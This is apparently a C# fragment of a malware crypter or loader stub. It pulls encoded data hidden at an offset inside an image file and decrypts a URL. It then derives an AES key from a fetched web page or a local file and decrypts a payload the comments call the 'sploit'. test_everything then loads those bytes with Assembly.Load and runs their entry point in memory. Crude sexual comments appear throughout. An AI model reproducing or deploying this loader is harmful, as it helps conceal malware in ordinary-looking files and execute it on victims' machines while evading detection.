public static byte[] stub_launch(byte[] url_data, string enc_pass, int png_offset, int pass_offset)
{ // this was NOT easy.
Byte[] salt = { 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2 }; //change
Byte[] b64_data_only = new Byte[url_data.Length - png_offset];
Buffer.BlockCopy(url_data, png_offset, b64_data_only, 0, url_data.Length - png_offset);
Byte[] comp_data = base64_decode(b64_data_only);
Byte[] enc_data = decompress_bin(comp_data);
int nn = enc_data[0] + (enc_data[1] << 8);
Byte[] enc_pre_pass = new Byte[nn];
Array.Copy(enc_data, 2, enc_pre_pass, 0, enc_pre_pass.Length);
Byte[] decrypted_url_pass = Enc.decrypt_small_pass(enc_pass, enc_pre_pass, salt);
Byte[] url_pass = Enc.depadit(decrypted_url_pass);
int enc_data_offset = enc_pre_pass.Length + 2;
String nurl = Encoding.UTF8.GetString(url_pass);
Byte[] enc_page; if (test_file(nurl))
{
enc_page = File.ReadAllBytes(nurl);
}
else
{
enc_page = get_page(nurl);
}
Byte[] master_pass = hash_page(enc_page, pass_offset);
Byte[] pass = new Byte[0x20]; Array.Copy(master_pass, master_pass.Length / 4, pass, 0, master_pass.Length / 2);
Byte[] pass_4 = new Byte[0x10]; Array.Copy(master_pass, master_pass.Length / 8, pass_4, 0, master_pass.Length / 4);
Byte[] enc_sploit_data = new Byte[enc_data.Length - enc_data_offset];
Array.Copy(enc_data, enc_data_offset, enc_sploit_data, 0, enc_sploit_data.Length);
Byte[] decrypted_sploit_bytes = Enc.aes_decrypt(enc_sploit_data, pass, pass_4); //moneyshot
return(decrypted_sploit_bytes);
}
// test our final image to veryify its working!
public static void test_everything(string output_file, string enc_pass, int offset, byte[] b64_test, string[] main_args, int code_position)
{
Byte[] salt = { 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2 };
Console.WriteLine("We are debugging it to make sure everything works properly!");
Byte[] enc_testdata = File.ReadAllBytes(output_file);
//int pos = do_png(enc_testdata);
//pos = pos + 37; // header length is 37
int pos = code_position;
Byte[] b64_data_only = new Byte[enc_testdata.Length - pos];
Buffer.BlockCopy(enc_testdata, pos, b64_data_only, 0, enc_testdata.Length - pos);
debug_print("TESTING, base64 data {0}", b64_data_only);
Byte[] comp_data = base64_decode(b64_data_only);
Byte[] enc_data = decompress_bin(comp_data);
// the length of the url, stored as Int16
int nn = enc_data[0] + (enc_data[1] << 8);
Byte[] enc_pre_pass = new Byte[nn];
Array.Copy(enc_data, 2, enc_pre_pass, 0, enc_pre_pass.Length);
Byte[] decrypted_url_pass = Enc.decrypt_small_pass(enc_pass, enc_pre_pass, salt);
Byte[] url_pass = Enc.depadit(decrypted_url_pass);
// the offset is our enc data minus the url
int enc_data_offset = enc_pre_pass.Length + 2;
String nurl = Encoding.UTF8.GetString(url_pass);
// get file or webpage for encryption
Byte[] enc_page;
if (test_file(nurl))
{
enc_page = File.ReadAllBytes(nurl);
}
else
{
enc_page = get_page(nurl);
}
Byte[] master_pass = hash_page(enc_page, offset);
debug_print("Our testing master_pass {0}", master_pass);
// I HATE doing it like this but meh...
Byte[] pass = new Byte[0x20];
Byte[] pass_4 = new Byte[0x10];
Array.Copy(master_pass, master_pass.Length / 4, pass, 0, master_pass.Length / 2);
Array.Copy(master_pass, master_pass.Length / 8, pass_4, 0, master_pass.Length / 4);
debug_print("Password Is: {0}", pass);
debug_print("The IV Is: {0}", pass_4);
Byte[] enc_sploit_data = new Byte[enc_data.Length - enc_data_offset]; // get ready for the money shot
Array.Copy(enc_data, enc_data_offset, enc_sploit_data, 0, enc_sploit_data.Length);
Byte[] decrypted_sploit_bytes = Enc.aes_decrypt(enc_sploit_data, pass, pass_4);
debug_print("Our encrypted file is: {0}", decrypted_sploit_bytes);
Console.WriteLine("Everything should have worked, loading the binary.");
// load the bytes into Assembly
Assembly a = Assembly.Load(decrypted_sploit_bytes);
// search for the Entry Point
MethodInfo method = a.EntryPoint;
if (method != null)
{
// GlobalAssemblyCache <-- ????
// create an istance of the Startup form Main method
Object o = a.CreateInstance(method.Name);
// copy main_args into new array, to use in object
String[] prog_args = new String[main_args.Length - 1]; // adjust this if we use more args!
Array.Copy(main_args, 1, prog_args, 0, main_args.Length - 1);
try
{
// invoke the application starting point
method.Invoke(o, new Object[] { prog_args }); // all over her face
}
catch (Exception e)
{
Console.WriteLine(e);
}
}
}
